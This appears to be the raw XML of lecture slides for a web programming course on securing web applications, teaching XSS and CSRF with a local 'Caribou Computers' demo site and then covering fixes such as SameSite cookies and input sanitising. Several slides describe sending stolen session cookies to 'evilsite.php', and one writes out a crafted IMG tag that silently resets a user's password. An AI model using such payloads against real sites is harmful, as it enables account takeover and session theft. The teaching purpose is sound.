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48" r:id="rId6"/>
    <p:sldId id="367" r:id="rId7"/>
    <p:sldId id="381" r:id="rId8"/>
    <p:sldId id="390" r:id="rId9"/>
    <p:sldId id="391" r:id="rId10"/>
    <p:sldId id="392" r:id="rId11"/>
    <p:sldId id="393" r:id="rId12"/>
    <p:sldId id="395" r:id="rId13"/>
    <p:sldId id="394" r:id="rId14"/>
    <p:sldId id="396" r:id="rId15"/>
    <p:sldId id="397" r:id="rId16"/>
    <p:sldId id="398" r:id="rId17"/>
    <p:sldId id="400" r:id="rId18"/>
    <p:sldId id="399" r:id="rId19"/>
    <p:sldId id="401" r:id="rId20"/>
    <p:sldId id="402" r:id="rId21"/>
    <p:sldId id="403" r:id="rId22"/>
    <p:sldId id="404" r:id="rId23"/>
    <p:sldId id="405" r:id="rId24"/>
    <p:sldId id="406" r:id="rId25"/>
    <p:sldId id="407" r:id="rId26"/>
    <p:sldId id="420" r:id="rId27"/>
    <p:sldId id="421" r:id="rId28"/>
    <p:sldId id="416" r:id="rId29"/>
    <p:sldId id="408" r:id="rId30"/>
    <p:sldId id="343" r:id="rId31"/>
    <p:sldId id="417" r:id="rId32"/>
    <p:sldId id="418" r:id="rId33"/>
    <p:sldId id="419" r:id="rId34"/>
    <p:sldId id="409" r:id="rId35"/>
    <p:sldId id="412"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35985551/how-does-csrf-work-without-state-parameter-in-oauth2-0" TargetMode="External"/><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127.0.0.1/CSRF%20Example/caribou_computers2.php"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owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_(SSR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5810330-F0B5-43C9-BC34-094FFB5C0529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="82704"/>
            <a:ext cx="12191999" cy="6502399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Rectangle 5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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server-Side Web Programming (COMP10260)</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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Securing Web Applications – Part III</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58" name="Straight Connector 5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6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marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now go back to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and you should see the session information in the comments page!</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95556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Is this still XSS?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t>We didn’t really mention it before but there are two major types of XSS!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>Reflected XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Where, the user is tricked into taking some action the results in a HTTP request making some kind of malicious change to the site.  Our prior example provided a malicious link that “bounced” off the Caribou Computer site in order to capture someone’s cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – This is when site data can be modified to access another web site in a malicious way.  Our comment “stored” our hack on the Caribou Computer site and would be activated every time a user read loaded that comment.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101107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aphical user interface&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2DCAE8B-5AE2-41B4-8687-2491E76B475D}"/>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548" b="14548"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{456B2633-4394-458A-9E9B-F2676C9CC933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Request Forging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AE7703E-3BBA-4051-A46B-77CD53C7542E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8AB5CE-83FA-48AD-964C-69C6DDD2FE32}"/>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stackoverflow.com/questions/35985551/how-does-csrf-work-without-state-parameter-in-oauth2-0"/>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60628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One more attack!</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t>Making malicious links can harm a site BUT people have to be tricked to click on them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storing JavaScript to be executed can also be a good attack but we need access to the site to plant it and it can only affect users that see it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if there was a kind of attack that could be executed simply by visiting a web page!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98721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Getting Started</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t>Log in as someone other than the administrator and point your browser at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_admin.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13975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1"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Caribou computers is getting pretty big and now they’ve realized that they need to hire someone to do some administrative tasks like change passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They don’t want to give this person access to their entire website, and they don’t really want to hire a developer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, they create an administration page in PHP to handle things!</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49264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1"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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The administrative page is secured against someone just randomly finding it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unless you’re logged in as the administrator you will get the very pointed message on the left!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log in as administrator and try again! (The password is: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thisismyadministratorpassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(to log in you will have to clear the cookies and go back to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_computers2.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> site!)</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582399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Ok, that’s better!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So here we have a page where the administrator (and only the administrator!) can select a user and change their password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go ahead and try it!</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299526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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, we’ve just changed Larry’s password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clearly this works by using a GET request and passing parameters in on the URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Site authentication is done by cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies are sent when a request is made to the host site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, in theory, if we could craft an HTTP request and somehow get the administrator to send it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then we could reset anyone’s password!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>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87747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There are a lot of ways to do this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Based on our last exploit you might think about using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>().</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, in the real world most cookies have a special flag set in them called “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” this stops the cookie from being sent in JavaScript requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When we talked about this back in the first lecture.   We mentioned that Advertisers use cookies to track what you are doing.</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28283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39CC-ADCB-CCFC-6D96-393CEC9C0B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Examples – Part IV</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6077BD2-23EB-7711-3CAE-D93B9FFCCA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>More XSS and Cross-site Request Forging (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2860291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Advertisers frequently simply have sites link to advertisement images on their sites…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And that’s our answer!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We create a webpage, with a specially crafted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;IMG&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tag on it which points to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_admin.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> page.</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&lt;IMG </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src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caribou_admin.php?larry</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on,newpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=sorry" /&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304412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Evilsite.com (again!)</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69" cy="397661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If the administrator of Caribou Computers even just visits a page with this tag on it.  It will create an HTTP request on their behalf.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which goes to the admin site along with this user's session cookie (remember we said that long lived cookies are bad?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The site simply processes the password change request!</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4074429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7285-5981-A5F1-F2C0-E30959860132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Fixing CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A079FE3-FEF5-53AA-C79A-2DAC85B723CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Similar to XSS there is a flag that can be set on HTTP cookies which can lower the risks of CSRF attacks succeeding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>This is known as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>sameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>” and if it set to “strict” then it will not allow requests that originate from another site.  So linking from evilsite.com would no longer work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>That said it won’t stop someone from doing the same kind of attack using injection.  Where the attacker is allowed to insert a URL to an image on the comment page on your site.  So sanitizing your inputs is always an important step in writing secure web applications.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369568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7922-9AA7-E910-2B66-6749A186E0DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A08:2021 – Software and Data Integrity Failures </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1C7299B-A968-A498-324A-E265DF31D405}"/>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007680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AE5B-F712-8CC3-40B0-82CD65486217}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A08:2021 – Software and Data Integrity Failures</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ABCBFE3-CAF4-380B-EE94-03B01CE284A2}"/>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CA" dirty="0"/>
              <a:t>Software integrity happens when it is not possible to reliably determine whether a piece of software is safe to install.  This happens frequently with hardware devices or drivers which are not signed (or have a weak signing algorithm).  Signing is a process by which a cryptographic hash is calculated for a piece of software.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Signing protects users from this kind of attack by having the software vendor publish both the software package and a cryptographic hash of it.  Users that download the software can use a hashing tool to generate a hash for the software they just downloaded.  Which they then compare to the published hash. If they match then software is considered to be unmodified.</a:t>
            </a:r>
